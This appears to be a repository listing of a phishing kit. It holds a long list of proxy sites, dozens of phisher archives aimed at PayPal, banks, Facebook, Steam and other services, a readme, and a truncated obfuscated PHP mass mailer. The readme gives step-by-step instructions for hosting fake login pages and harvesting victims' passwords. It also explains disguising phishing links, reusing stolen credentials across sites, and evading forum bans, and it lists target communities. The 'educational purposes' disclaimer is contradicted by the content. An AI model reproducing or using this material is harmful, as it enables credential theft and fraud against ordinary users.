     1101 +http://schnarre-monika.celebrityblog...
     1102 +http://filter2005.com/
     1103 +http://www.kproxy.com/
     1104 +http://www.websitereactor.org/cgi-bi...
     1105 +http://www.goproxing.com/
     1106 +http://anonycat.com/
     1107 +http://www.spynot.com/
     1108 +http://www.merletn.org/anonymizer
     1109 +http://www.cgi-proxy.net/
     1110 +http://www.proxymouse.com/
     1111 +http://www.theunblocker.tk/
     1112 +http://www.betaproxy.com/
     1113 +http://www.letsproxy.com/
     1114 +http://www.freeproxysurf.info/
     1115 +http://www.mysticproxy.com/
     1116 +http://www.proxywave.com/
     1117 +http://www.vtunnel.com/
     1118 +http://www.proxysnail.com/
     1119 +http://www.freeproxy.ca/
     1120 +http://basic.3proxy.com/
     1121 +http://www.privatebrowsing.com/
     1122 +http://www.hackingtruths.org/proxy
     1123 +http://xanproxy.be/
     1124 +http://www.ipsecret.com/
     1125 +http://www.proxyanon.com/
     1126 +http://www.anonproxy.info/
     1127 +http://www.proxysafe.com/
     1128 +http://www.strongproxy.com/
     1129 +http://www.boredatschool.net/
     1130 +http://www.ukproxy.com/
     1131 +http://www.simpleproxy.com/
     1132 +http://www.phproxy.org/
     1133 +http://surfonym.com/
     1134 +http://geoepker.hu/freeproxy/
     1135 +http://www.browseatwork.com/
     1136 +http://www.ipblocker.info/
     1137 +http://www.boredatwork.info/
     1138 +http://www.anonymousurfing.info/
     1139 +http://www.browsingwork.com/
     1140 +http://www.freeproxyserver.org/
     1141 +http://www.browseany.com/
     1142 +http://www.browsesecurely.com/
     1143 +http://ieproxy.com/
     1144 +http://www.sneak3.po.gs/
     1145 +http://www.proxytastic.com/
     1146 +http://www.freewebproxy.org/
     1147 +http://www.thecgiproxy.com/
     1148 +http://www.hide-me.be/
     1149 +http://www.anotherproxy.com/
     1150 +http://www.proxy77.com/
     1151 +http://www.surf-anon.com/
     1152 +http://www.free-proxy.info/
     1153 +http://www.theproxysite.info/
     1154 +http://www.proxyify.info/
     1155 +http://www.concealme.com/
     1156 +http://browseschool.info/
     1157 +http://browsework.info/
     1158 +http://browsingwork.info/
     1159 +http://browsingschool.com/
     1160 +http://www.proxyindex.com/
     1161 +http://www.gobyproxy.com/
     1162 +http://www.proxifyme.com/
     1163 +http://www.proxyghost.com/
     1164 +http://www.spysurfing.com/
     1165 +http://www.unblockthis.com/
     1166 +http://www.proxyserver7.com/
     1167 +http://www.daveproxy.co.uk/
     1168 +http://www.tntproxy.com/
     1169 +http://www.neoproxy.net/
     1170 +http://www.bypassbrowser.com/
     1171 +http://www.procksie.com/
     1172 +http://www.httproxy.com/
     1173 +http://www.cgiproxy.info/
     1174 +http://www.silentsurf.com/cgi-bin/np...
     1175 +http://www.proxy-sock.com/
     1176 +http://www.proxygeek.com/
     1177 +http://www.datadefense.org/
     1178 +http://www.hideyour.info/
     1179 +http://www.howto.pro/
     1180 +http://www.collegeproxy.com/
     1181 +http://www.demonproxy.com/
     1182 +http://www.satanproxy.com/
     1183 +http://www.hidingyou.com/
     1184 +http://www.intelliproxy.com/
     1185 +http://www.fireprox.com/
     1186 +http://www.h0h0h0.com/firewall/
     1187 +http://www.katedrala.cz/
     1188 +http://www.browseatwork.net/
     1189 +http://www.2255.info/
     1190 +http://www.vproxy.be/
     1191 +http://www.boxproxy.com/
     1192 +http://www.nopimps.com/
     1193 +http://www.fsurf.com/
     1194 +http://www.proxylord.com/
     1195 +http://roachhost.com/hp/
     1196 +http://www.freepr0xy.com/
     1197 +http://www.proxypop.com/
     1198 +http://proxy.winidn.com/
     1199 +http://www.cloax.net/
     1200 +http://www.proxy247.com/
     1201 +http://www.traceless.com/
     1202 +http://www.siatec.net/proxyanonymizer
     1203 +http://www.stealth-ip.net/
     1204 +http://www.proxywhip.com/
     1205 +http://www.proxy-surf.net/
     1206 +http://www.videoeditors.info/proxy/
     1207 +http://www.blockmy.info/
     1208 +http://www.proxychatroom.com/
     1209 +http://www.teenproxy.com/
     1210 +http://www.totalupload.com/surf/
     1211 +http://www.proxene.com/
     1212 +http://www.fileshack.us/proxy.php
     1213 +http://www.cloaker.ca/
     1214 +http://www.proxified.net/
     1215 +http://www.mrreid.net/
     1216 +https://proxy.autistici.org/
     1217 +http://anonymizer.autistici.org/
     1218 +http://www.anonymizer.com/
     1219 +http://www.surfola.com/
     1220 +http://www.a4u.at/
     1221 +http://computerboy88.virtualave.net/...
     1222 +http://www.surflondon.co.uk/123anon/...
     1223 +http://www.wablair.digitalspace.net/...
     1224 +http://www.blazeboard.com/nph-proxy.cgi
     1225 +http://nethush.com/
     1226 +http://www.privateproxy.net/
     1227 +http://www.safeproxy.net/
     1228 +http://slinky.lv6.net/index.html
     1229 +http://dsl2k.hypermart.net/cgi-bin/c...
     1230 +http://www.jmarshall.com/tools/cgiproxy/
     1231 +http://virus.hwn.ru/
     1232 +http://proxy.pp.ru/
     1233 +http://proxy.webshopcd.ru/
     1234 +http://www.subdimension.com/nettools...
     1235 +http://www.safeproxy.org/cgi-bin/nph...
     1236 +https://secure.fc2.com/smartipm/nph-...
     1237 +http://www.rewebber.com/
     1238 +http://www.thestrongestlinks.com/
     1239 +http://www.gunshin.net/cgi-bin/nph-p...
     1240 +http://www.free2.surffreedom.com/nph...
     1241 +https://nadaily.com/cgi-bin/nph-prox...
     1242 +http://www.consti.de/proxy/
     1243 +http://knez.ru/proxy/nph-proxy.cgi
     1244 +http://proxy.flooda.us/nph-proxy.cgi
     1245 +http://www.anonymisierungsdienst.de/...
     1246 +http://www.anonprox.com/nph-proxy.cgi
     1247 +http://www.chatos.com//proxy//special/
     1248 +http://www.abecx.net/cgi-bin/cgiprox...
     1249 +http://www.goproxy.com/cgi-bin/nph-p...
     1250 +http://www.peachieness.com/cgi-bin/n...
     1251 +http://www.schematic.org/proxy.php
     1252 +http://proxy.ocramc.com/
     1253 +https://www.orangatango.com/
     1254 +http://proxy.ocramc.info/
     1255 +http://shady.mytwinports.com/anon/
     1256 +http://www.1costaricalink.com/cgi-bi...
     1257 +http://www.wowbrowse.com/
     1258 +http://www.web2ftp.com/
     1259 +http://www2ftp.de/
     1260 +http://www.marzie.com/ftpstart.asp
     1261 +http://webftp.host.sk/
     1262 +http://ukproxy.com/web-based-ftp-pro...
     1263 +http://www.proxybuster.net/
     1264 +http://www.a4u.at/
     1265 +http://www.jmarshall.com/tools/cgiproxy/
     1266 +http://www.freeproxy.ru/en/free_prox...
     1267 +http://www.underproxy.com
     1268 +http://www.proxybrowsing.com/
     1269 +http://www.proxypimp.com/
     1270 +http://www.proxymafia.net/
     1271 +http://www.browse.ms/
     1272 +http://www.cantbustme.com/
     1273 +http://www.invisiblesurfing.com/
     1274 +http://www.kroxy.net/
     1275 +http://www.enableprivacy.com/
     1276 +http://www.unblock.biz/
     1277 +http://www.http404.info/
     1278 +http://1hitko.com/proxy/
     1279 +http://www.proxyheg.info
     1280 +http://welazy.com/nick
     1281 +http://manyscripts.com
     1282 +http://buzzysplat.com
     1283 +http://onlyproxy.com
     1284 +http://proxy.rocko.ge/
     1285 +http://www.proxytown.org
     1286 +http://vidznet.com/pr
     1287 +http://ecoproxy.com
     1288 +http://up.romania5.net/phpproxy.php
     1289 +http://startusingproxy.info
     1290 +http://googlenetwork.org
     1291 +http://www.bypasser.info/
     1292 +http://tor.eff.org/
     1293 +http://spuddy.faithhosts.com/fold
     1294 +http://underproxy.com
     1295 +http://www.php15.com
     1296 +http://www.dastylex.com/wrapper/12.html
     1297 +http://reallycoolproxy.com
     1298 +http://mycoolproxy.com
     1299 +http://proxy.mixchaat.com
     1300 +http://www.soutelgad.com/proxy/
     1301 +http://nevets933.info
     1302 +http://www.hidip.info
     1303 +http://www.proxter.us
     1304 +http://www.proxcool.com
     1305 +http://www.proxholic.com
     1306 +http://azurf.com
     1307 +http://clif3.com
     1308 +http://aznq.com
     1309 +http://obtrice.com
     1310 +http://bypasser.org
     1311 +http://vidztec.com
     1312 +http://proxyize.com
     1313 +http://proxyize.net
     1314 +http://bypasser.org
     1315 +http://azurf.com
     1316 +http://proxcool.com
     1317 +http://proxter.us
     1318 +http://hidelink.info
     1319 +http://proxholic.com
     1320 +http://cutmy.info
     1321 +http://www.bautizame.com/proxy
     1322 +http://uaz.info
     1323 +http://www.unipeak.com
     1324 +http://hide4eva.info
     1325 +http://www.bestfastproxy.com/
     1326 +http://tipsfind.com/proxy
     1327 +http://hidelink.info
     1328 +http://cutmy.info
     1329 +http://hide4eva.info
     1330 +http://www.liveprox.com/
     1331 +http://www.proxypro.nl
     1332 +http://www.vidztec.com
     1333 +http://ProxyIze.com
     1334 +http://www.whatfilter.com
     1335 +http://www.youroogle.com
     1336 +http://www.onlyproxy.com
     1337 +http://WWW.PROXYOWL.NET
     1338 +http://www.viproxy.net
     1339 +http://www.gundon.com
     1340 +http://eproxy.pl
     1341 +http://lawyerproxy.com
     1342 +http://murl.pl/?http://proxylist.moo...
     1343 +http://murl.pl/?http://lawyerproxy.com
     1344 +http://www.liveprox.com/
     1345 +http://www.timeproxy.com
     1346 +http://fixnt.com
     1347 +http://www.proxices.com
     1348 +http://proxy.proxygod.net
     1349 +http://forums.proxygod.net/
     1350 +http://www.ukproxyes.net
     1351 +http://www.usaproxyes.net
     1352 +http://http://www.maskmyip.net
     1353 +http://ProxyIze.net
     1354 +http://Svyt.com
     1355 +http://ProxyIze.com
     1356 +http://cyberproxy.info
     1357 +http://SVYT.com/cgiproxy
     1358 +http://proxynetwork.us/
     1359 +http://hidebehind.net
     1360 +http://allfreehere.info
     1361 +http://takefreely.info
     1362 +http://hagiomusic.info
     1363 +http://proxyzip.org
     1364 +http://greenpips.info
     1365 +http://2og.biz/
     1366 +http://www.4ym.biz/
     1367 +http://www.6fl.org/
     1368 +http://www.6yk.biz/
     1369 +http://www.7s1.org/
     1370 +http://www.blockd.info/
     1371 +http://www.facebookprox.info/
     1372 +http://www.h7j.org/
     1373 +http://www.hi5prox.info/
     1374 +http://www.hidemefromthefeds.info/
     1375 +http://www.hidemeplease.info/
     1376 +http://www.i9o.biz/
     1377 +http://www.jamminprox.info/
     1378 +http://www.myspaceprox.info/
     1379 +http://www.newprox.info/
     1380 +http://www.officialprox.info/
     1381 +http://www.tdotproxy.com/
     1382 +http://www.tdotproxy.info/
     1383 +http://www.top20hh.com/
     1384 +http://www.ucprox.info/
     1385 +http://www.undergrounddesi.com/
     1386 +http://www.w8p.biz/
     1387 +http://www.y3m.org/
     1388 +http://www.z4f.us/
  • PayPal Phisher.rar
    Binary file.
  • Phisher Maker!.rar
    Binary file.
  • Phishing Letters.rar
    Binary file.
  • Photobucker Phiser.zip
    Binary file.
  • PornoTube Phisher.rar
    Binary file.
  • Portable HTML Encrypter_050620204707.exe
    Binary file.
  • ■ ■ ■ ■ ■ ■
    READ.ME.FIRST.txt
     1 +Pack Includes:
     2 +-AnonymousMailer
     3 +-Phisher Maker! Read the ReadMe.txt
     4 +-Jiffy Gmail Account Creator - Create GMAIL acc for setting up hosting acc etc.
     5 +-Tarantula a Powerful software to extract e-mail addresses matching your keyword query
     6 +-RapidExtract is a tool that checks EMAIL:PASSWORD lists, for rapidshare accounts, if the email has a rapidshare account it then sends the login to the email. Then you can login to the email (most people use same pass for everything) and obtain the rapidshare account.
     7 +-IP Hider Pack - Read the ReadMe.txt
     8 +-Steam Phiser
     9 +-Rapidshare Phiser
     10 +-Friendster Phiser
     11 +-Gmail Phisher
     12 +-Habbo Phisher
     13 +-Facebook Phisher
     14 +-Photobucket Phisher
     15 +-XboxLive Phisher
     16 +-AIM Phisher
     17 +-GaiaOnline Phisher
     18 +-IMVU Phisher
     19 +-AstaTalk Phisher
     20 +-Warez-bb Phisher
     21 +-Hotmail Phisher
     22 +-Paypal Phisher
     23 +-Runescape Phisher
     24 +-youtube Phisher
     25 +and many many more.
     26 +
     27 +---What is a phisher---
     28 +Basically a phisher is a fake login page, that is made to look exactly like the real login page of the real website so as to fool somebody into entering their information and sending it to you.
     29 +
     30 +---How can I get somebody to login to my phisher---
     31 +That's for you to find out, use your mind. Probably the simplest way is Social Engineering and some phishing skill Here is an example : http://imgdevil.com/pfiles/140/phisher.jpg
     32 +
     33 +---How to use---
     34 +Find a web host that supports php.
     35 +Upload all of the files to your web hosting.
     36 +Goto the link (yoursite.freehostname.com or whatever) and it should show the login if you uploaded it in the root directory.Send your victim the Index page.
     37 +To get the passwords they enter goto yoursite.freehostname.com/passwords.txt, or whatever the name of your text file is.
     38 +Remember to have the .txt file always on CHMOD 777 to enable it to be writtable.
     39 +
     40 +---Changing the log.txt or password.txt to something else---
     41 +First rename your text file to what you want it, so nobody can guess it.
     42 +Then open the next.php (or may be named out.php)and edit the text that says passes.txt to whatever you named your text file.
     43 +
     44 +---How to hide links in forums---
     45 +If your trying to post it where html is allowed its:
     46 +<a href="http://yourphisherlink.com">http://yourreallink.com</a>
     47 +
     48 +If you are trying to post it on forms its:
     49 +[url=http://yourphisherlink.com]http://yourreallink.com[/url]
     50 +
     51 +---Free Hosting for your phisers---
     52 +* 110mb - http://110mb.com
     53 +* Ripway - http://ripway.com
     54 +* SuperFreeHost - http://superfreehost.info
     55 +* Freehostia - http://freehostia.com
     56 +* Funpic - http://funpic.de (How to remove ads?)
     57 +* Funpic - http://funpic.org (How to remove ads?)
     58 +* Freeweb7 - http://freeweb7.com
     59 +* t35 - http://t35.com
     60 +* Awardspace - http://awardspace.com
     61 +* PHPNet - http://phpnet.us
     62 +* Free Web Hosting Pro - http://freewebhostingpro.com
     63 +* ProHosts - http://prohosts.org
     64 +* AtSpace - http://atspace.com
     65 +* ByetHost - http://byethost.com/
     66 +* 000webhost - http://000webhost.com/
     67 +* My5GB - http://www.my5gb.com/
     68 +* Oxyhost - http://www.oxyhost.com/
     69 +* Rack111 - http://www.rack111.com/
     70 +* Ocostwebhost - http://0costwebhost.com/
     71 +* FreeZoka - http://www.freezoka.com/
     72 +
     73 +---Free Domain List---
     74 +* .TK - http://dot.tk/
     75 +* .CJB.NET - http://cjb.net/
     76 +* .DOM.IR - http://dom.ir/
     77 +* .EURO.ST & MANY MORE - http://ulimit.com/en
     78 +* .CO.CC - http://co.cc/
     79 +* .CO.NR - http://freedomain.co.nr/
     80 +* .US.TT & MANY MORE - http://joynic.com
     81 +* .UNI.CC - http://uni.cc/
     82 +* .CA.GS - http://ca.gs
     83 +
     84 +---Email Spammers---
     85 +http://padu.info/
     86 +
     87 +
     88 +---URL Hiders---
     89 +http://2isp.com
     90 +http://tinyurl.com
     91 +http://w3t.org
     92 +http://lix.in
     93 +http://sturly.com
     94 +http://urlprune.com
     95 +http://rarme.com
     96 +http://doiop.com/
     97 +http://rapidlayer.in/
     98 +http://myref.de/
     99 +http://link-protector.com/
     100 +http://www.lil-link.com/
     101 +http://urlite.com/
     102 +http://protect-links.com
     103 +http://snurl.com
     104 +http://lil-links.com
     105 +http://rapidbolt.com
     106 +http://snip-it.com
     107 +
     108 +---Proxies if you get banned on forums for posting phisers---
     109 +http://subno.info
     110 +http://jeal.info
     111 +http://workstudyguide.com
     112 +http://mariogold.com
     113 +http://unblockthissite.com
     114 +http://kproxy.com
     115 +-MORE IN THE PROXY.txt or just get onto www.proxy.org
     116 +
     117 +---Interesting tools/sites---
     118 +http://fakenamegenerator.com/ - hacked a unverified paypal or something change the name no ideas see this
     119 +http://www.fakemailer.net/
     120 +http://www.deadfake.com/
     121 +
     122 +---Site to Phish at---
     123 +http://smforum.net/
     124 +http://wrzboard.org/
     125 +http://blitzwarez.net/
     126 +http://warezscene.org/
     127 +http://blackbay.org/
     128 +http://warezforum.info/forum/
     129 +http://projectw.org/
     130 +http://crazy-coderz.net/index.php (Closed)
     131 +http://voide.org/
     132 +http://warez-it.co.uk/
     133 +http://t-warez.com/
     134 +http://share4life.co.uk/forums/
     135 +http://forumw.org/
     136 +http://tehparadox.com/
     137 +http://wrzteam.com/vb/
     138 +http://katzforums.com/
     139 +http://usawarez.net/forum/index.php
     140 +http://silentground.org/forums/
     141 +http://xtremew.org/
     142 +http://wckedforums.com/
     143 +http://porn-bb.org
     144 +http://www.forumophilia.com/index.php
     145 +http://www.warezcountry.org/
     146 +http://mpcforum.com
     147 +http://gamerzneeds.net
     148 +http://gamerzplanet.net
     149 +http://pornbb.org
     150 +http://warezshares.com
     151 +http://puzo.us
     152 +http://puso.org
     153 +
     154 +
     155 +And Any Other Community Out there Basically. Its all about Mixing :D
     156 +
     157 +--------------------------------------------------------------------------------------------------------------------
     158 +The Author Of This Guide Is NOT Responsible For ANYTHING You Do With This , I encourage you not to use any of this. It was only created for educational purposes and to demonstrate how web pages are vulnerable. If you EVER see a phisher please report it.PHISHERS ARE ILLEGAL.
     159 +
     160 +materials gathered from : voide.org,blackbay.org and downloadslc.info and pic tut by Innovator
     161 +Pack compiled and read me written by : lagiosman~ (http://madspot.org - downloadslc.info)
  • RapidExtract.rar
    Binary file.
  • Regions Phisher.rar
    Binary file.
  • Ripway Phisher.rar
    Binary file.
  • RuneScape Phisher.rar
    Binary file.
  • SendSpace Phisher.rar
    Binary file.
  • Skype Phisher.rar
    Binary file.
  • SourceForge Phisher.rar
    Binary file.
  • Steam Phiser.zip
    Binary file.
  • Tagged Phisher.rar
    Binary file.
  • Tarantula.rar
    Binary file.
  • WWE Phisher.rar
    Binary file.
  • Warez-bb Phisher.rar
    Binary file.
  • Wells Fargo Phisher.rar
    Binary file.
  • WindowsSupport.zip
    Binary file.
  • WoW Phisher.zip
    Binary file.
  • XboxLive Phisher.zip
    Binary file.
  • YouTube Phisher.rar
    Binary file.
  • astatalk Phisher.rar
    Binary file.
  • cazmailer.php
    Diff is too large to be displayed.
  • facebook Phisher.zip
    Binary file.
  • hotmail Phisher.zip
    Binary file.
  • thisis50 Phisher.rar
    Binary file.
  • ■ ■ ■ ■ ■ ■
    xleetmailer_050620204927.php
     1 +<?php
     2 +/**
     3 + * Xleet PHP Mailer by [xleet.io]
     4 + * @version : 2.7
     5 +**/
     6 +
     7 +$password = ""; // MaILER Password
     8 +
     9 +
     10 +eval (base64_decode("
session_start();
error_reporting(0);
set_time_limit(0);
ini_set("memory_limit",-1);


$leaf['version']="1.0";
$leaf['website']="xleet.io";


$sessioncode = md5(__FILE__);
if(!empty($password) and $_SESSION[$sessioncode] != $password){
    # _REQUEST mean _POST or _GET 
    if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) {
        $_SESSION[$sessioncode] = $password;
    }
    else {
        print "<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>";
        exit;        
    }
}

if($_POST['action']=="send"){
    $senderEmail=leafTrim($_POST['senderEmail']);
    $senderName=leafTrim($_POST['senderName']);
    $replyTo=leafTrim($_POST['replyTo']);
    $subject=leafTrim($_POST['subject']);
    $emailList=leafTrim($_POST['emailList']);
    $messageType=leafTrim($_POST['messageType']);
    $messageLetter=leafTrim($_POST['messageLetter']);    
    $messageLetter = urlencode($messageLetter);
    $messageLetter = ereg_replace("%5C%22", "%22", $messageLetter);
    $messageLetter = urldecode($messageLetter);
    $messageLetter = stripslashes($messageLetter);
    $subject = stripslashes($subject);
    $encode = stripslashes($encode);


}
if($messageType==2){
    $plain="checked";
}
else {
    $html="checked";
}

function leafClear($text,$email){
    $emailuser = preg_replace('/([^@]*).*/', '$1', $email);
    $text = str_replace("[-time-]", date("m/d/Y h:i:s a", time()), $text);
    $text = str_replace("[-email-]", $email, $text);
    $text = str_replace("[-emailuser-]", $emailuser, $text);
    $text = str_replace("[-randomletters-]", randString('abcdefghijklmnopqrstuvwxyz'), $text);
    $text = str_replace("[-randomstring-]", randString('abcdefghijklmnopqrstuvwxyz0123456789'), $text);
    $text = str_replace("[-randomnumber-]", randString('0123456789'), $text);
    $text = str_replace("[-randommd5-]", md5(randString('abcdefghijklmnopqrstuvwxyz0123456789')), $text);
    return $text;
    
}
function leafTrim($string){
return stripslashes(ltrim(rtrim($string)));
}
function randString($consonants) {
    $length=rand(12,25);
    $password = '';
    for ($i = 0; $i < $length; $i++) {
            $password .= $consonants[(rand() % strlen($consonants))];
    }
    return $password;
}
function leafMailCheck($email){
   $exp = "^[a-z\'0-9]+([._-][a-z\'0-9]+)*@([a-z0-9]+([._-][a-z0-9]+))+$";
   if(eregi($exp,$email)){
        if(checkdnsrr(array_pop(explode("@",$email)),"MX")){return true;}
        else{return false;}
   }
   else{return false;}    
}

class PHPMailer
{
    /**
     * The PHPMailer Version number.
     * @var string
     */
    public $Version = '5.2.14';

    /**
     * Email priority.
     * Options: null (default), 1 = High, 3 = Normal, 5 = low.
     * When null, the header is not set at all.
     * @var integer
     */
    public $Priority = null;

    /**
     * The character set of the message.
     * @var string
     */
    public $CharSet = 'iso-8859-1';

    /**
     * The MIME Content-type of the message.
     * @var string
     */
    public $ContentType = 'text/plain';

    /**
     * The message encoding.
     * Options: "8bit", "7bit", "binary", "base64", and "quoted-printable".
     * @var string
     */
    public $Encoding = '8bit';

    /**
     * Holds the most recent mailer error message.
     * @var string
     */
    public $ErrorInfo = '';

    /**
     * The From email address for the message.
     * @var string
     */
    public $From = 'root@localhost';

    /**
     * The From name of the message.
     * @var string
     */
    public $FromName = 'Root User';

    /**
     * The Sender email (Return-Path) of the message.
     * If not empty, will be sent via -f to sendmail or as 'MAIL FROM' in smtp mode.
     * @var string
     */
    public $Sender = '';

    /**
     * The Return-Path of the message.
     * If empty, it will be set to either From or Sender.
     * @var string
     * @deprecated Email senders should never set a return-path header;
     * it's the receiver's job (RFC5321 section 4.4), so this no longer does anything.
     * @link https://tools.ietf.org/html/rfc5321#section-4.4 RFC5321 reference
     */
    public $ReturnPath = '';

    /**
     * The Subject of the message.
     * @var string
     */
    public $Subject = '';

    /**
     * An HTML or plain text message body.
     * If HTML then call isHTML(true).
     * @var string
     */
    public $Body = '';

    /**
     * The plain-text message body.
     * This body can be read by mail clients that do not have HTML email
     * capability such as mutt & Eudora.
     * Clients that can read HTML will view the normal Body.
     * @var string
     */
    public $AltBody = '';

    /**
     * An iCal message part body.
     * Only supported in simple alt or alt_inline message types
     * To generate iCal events, use the bundled extras/EasyPeasyICS.php class or iCalcreator
     * @link http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/
     * @link http://kigkonsult.se/iCalcreator/
     * @var string
     */
    public $Ical = '';

    /**
     * The complete compiled MIME message body.
     * @access protected
     * @var string
     */
    protected $MIMEBody = '';

    /**
     * The complete compiled MIME message headers.
     * @var string
     * @access protected
     */
    protected $MIMEHeader = '';

    /**
     * Extra headers that createHeader() doesn't fold in.
     * @var string
     * @access protected
     */
    protected $mailHeader = '';

    /**
     * Word-wrap the message body to this number of chars.
     * Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance.
     * @var integer
     */
    public $WordWrap = 0;

    /**
     * Which method to use to send mail.
     * Options: "mail", "sendmail", or "smtp".
     * @var string
     */
    public $Mailer = 'mail';

    /**
     * The path to the sendmail program.
     * @var string
     */
    public $Sendmail = '/usr/sbin/sendmail';

    /**
     * Whether mail() uses a fully sendmail-compatible MTA.
     * One which supports sendmail's "-oi -f" options.
     * @var boolean
     */
    public $UseSendmailOptions = true;

    /**
     * Path to PHPMailer plugins.
     * Useful if the SMTP class is not in the PHP include path.
     * @var string
     * @deprecated Should not be needed now there is an autoloader.
     */
    public $PluginDir = '';

    /**
     * The email address that a reading confirmation should be sent to, also known as read receipt.
     * @var string
     */
    public $ConfirmReadingTo = '';

    /**
     * The hostname to use in the Message-ID header and as default HELO string.
     * If empty, PHPMailer attempts to find one with, in order,
     * $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value
     * 'localhost.localdomain'.
     * @var string
     */
    public $Hostname = '';

    /**
     * An ID to be used in the Message-ID header.
     * If empty, a unique id will be generated.
     * @var string
     */
    public $MessageID = '';

    /**
     * The message Date to be used in the Date header.
     * If empty, the current date will be added.
     * @var string
     */
    public $MessageDate = '';

    /**
     * SMTP hosts.
     * Either a single hostname or multiple semicolon-delimited hostnames.
     * You can also specify a different port
     * for each host by using this format: [hostname:port]
     * (e.g. "smtp1.example.com:25;smtp2.example.com").
     * You can also specify encryption type, for example:
     * (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465").
     * Hosts will be tried in order.
     * @var string
     */
    public $Host = 'localhost';

    /**
     * The default SMTP server port.
     * @var integer
     * @TODO Why is this needed when the SMTP class takes care of it?
     */
    public $Port = 25;

    /**
     * The SMTP HELO of the message.
     * Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find
     * one with the same method described above for $Hostname.
     * @var string
     * @see PHPMailer::$Hostname
     */
    public $Helo = '';

    /**
     * What kind of encryption to use on the SMTP connection.
     * Options: '', 'ssl' or 'tls'
     * @var string
     */
    public $SMTPSecure = '';

    /**
     * Whether to enable TLS encryption automatically if a server supports it,
     * even if `SMTPSecure` is not set to 'tls'.
     * Be aware that in PHP >= 5.6 this requires that the server's certificates are valid.
     * @var boolean
     */
    public $SMTPAutoTLS = true;

    /**
     * Whether to use SMTP authentication.
     * Uses the Username and Password properties.
     * @var boolean
     * @see PHPMailer::$Username
     * @see PHPMailer::$Password
     */
    public $SMTPAuth = false;

    /**
     * Options array passed to stream_context_create when connecting via SMTP.
     * @var array
     */
    public $SMTPOptions = array();

    /**
     * SMTP username.
     * @var string
     */
    public $Username = '';

    /**
     * SMTP password.
     * @var string
     */
    public $Password = '';

    /**
     * SMTP auth type.
     * Options are LOGIN (default), PLAIN, NTLM, CRAM-MD5
     * @var string
     */
    public $AuthType = '';

    /**
     * SMTP realm.
     * Used for NTLM auth
     * @var string
     */
    public $Realm = '';

    /**
     * SMTP workstation.
     * Used for NTLM auth
     * @var string
     */
    public $Workstation = '';

    /**
     * The SMTP server timeout in seconds.
     * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2
     * @var integer
     */
    public $Timeout = 300;

    /**
     * SMTP class debug output mode.
     * Debug output level.
     * Options:
     * * `0` No output
     * * `1` Commands
     * * `2` Data and commands
     * * `3` As 2 plus connection status
     * * `4` Low-level data output
     * @var integer
     * @see SMTP::$do_debug
     */
    public $SMTPDebug = 0;

    /**
     * How to handle debug output.
     * Options:
     * * `echo` Output plain-text as-is, appropriate for CLI
     * * `html` Output escaped, line breaks converted to `<br>`, appropriate for browser output
     * * `error_log` Output to error log as configured in php.ini
     *
     * Alternatively, you can provide a callable expecting two params: a message string and the debug level:
     * <code>
     * $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";};
     * </code>
     * @var string|callable
     * @see SMTP::$Debugoutput
     */
    public $Debugoutput = 'echo';

    /**
     * Whether to keep SMTP connection open after each message.
     * If this is set to true then to close the connection
     * requires an explicit call to smtpClose().
     * @var boolean
     */
    public $SMTPKeepAlive = false;

    /**
     * Whether to split multiple to addresses into multiple messages
     * or send them all in one message.
     * @var boolean
     */
    public $SingleTo = false;

    /**
     * Storage for addresses when SingleTo is enabled.
     * @var array
     * @TODO This should really not be public
     */
    public $SingleToArray = array();

    /**
     * Whether to generate VERP addresses on send.
     * Only applicable when sending via SMTP.
     * @link https://en.wikipedia.org/wiki/Variable_envelope_return_path
     * @link http://www.postfix.org/VERP_README.html Postfix VERP info
     * @var boolean
     */
    public $do_verp = false;

    /**
     * Whether to allow sending messages with an empty body.
     * @var boolean
     */
    public $AllowEmpty = false;

    /**
     * The default line ending.
     * @note The default remains "\n". We force CRLF where we know
     *        it must be used via self::CRLF.
     * @var string
     */
    public $LE = "\n";

    /**
     * DKIM selector.
     * @var string
     */
    public $DKIM_selector = '';

    /**
     * DKIM Identity.
     * Usually the email address used as the source of the email
     * @var string
     */
    public $DKIM_identity = '';

    /**
     * DKIM passphrase.
     * Used if your key is encrypted.
     * @var string
     */
    public $DKIM_passphrase = '';

    /**
     * DKIM signing domain name.
     * @example 'example.com'
     * @var string
     */
    public $DKIM_domain = '';

    /**
     * DKIM private key file path.
     * @var string
     */
    public $DKIM_private = '';

    /**
     * Callback Action function name.
     *
     * The function that handles the result of the send email action.
     * It is called out by send() for each email sent.
     *
     * Value can be any php callable: http://www.php.net/is_callable
     *
     * Parameters:
     *   boolean $result        result of the send action
     *   string  $to            email address of the recipient
     *   string  $cc            cc email addresses
     *   string  $bcc           bcc email addresses
     *   string  $subject       the subject
     *   string  $body          the email body
     *   string  $from          email address of sender
     * @var string
     */
    public $action_function = '';

    /**
     * What to put in the X-Mailer header.
     * Options: An empty string for PHPMailer default, whitespace for none, or a string to use
     * @var string
     */
    public $XMailer = '';

    /**
     * An instance of the SMTP sender class.
     * @var SMTP
     * @access protected
     */
    protected $smtp = null;

    /**
     * The array of 'to' names and addresses.
     * @var array
     * @access protected
     */
    protected $to = array();

    /**
     * The array of 'cc' names and addresses.
     * @var array
     * @access protected
     */
    protected $cc = array();

    /**
     * The array of 'bcc' names and addresses.
     * @var array
     * @access protected
     */
    protected $bcc = array();

    /**
     * The array of reply-to names and addresses.
     * @var array
     * @access protected
     */
    protected $ReplyTo = array();

    /**
     * An array of all kinds of addresses.
     * Includes all of $to, $cc, $bcc
     * @var array
     * @access protected
     * @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc
     */
    protected $all_recipients = array();

    /**
     * An array of names and addresses queued for validation.
     * In send(), valid and non duplicate entries are moved to $all_recipients
     * and one of $to, $cc, or $bcc.
     * This array is used only for addresses with IDN.
     * @var array
     * @access protected
     * @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc
     * @see PHPMailer::$all_recipients
     */
    protected $RecipientsQueue = array();

    /**
     * An array of reply-to names and addresses queued for validation.
     * In send(), valid and non duplicate entries are moved to $ReplyTo.
     * This array is used only for addresses with IDN.
     * @var array
     * @access protected
     * @see PHPMailer::$ReplyTo
     */
    protected $ReplyToQueue = array();

    /**
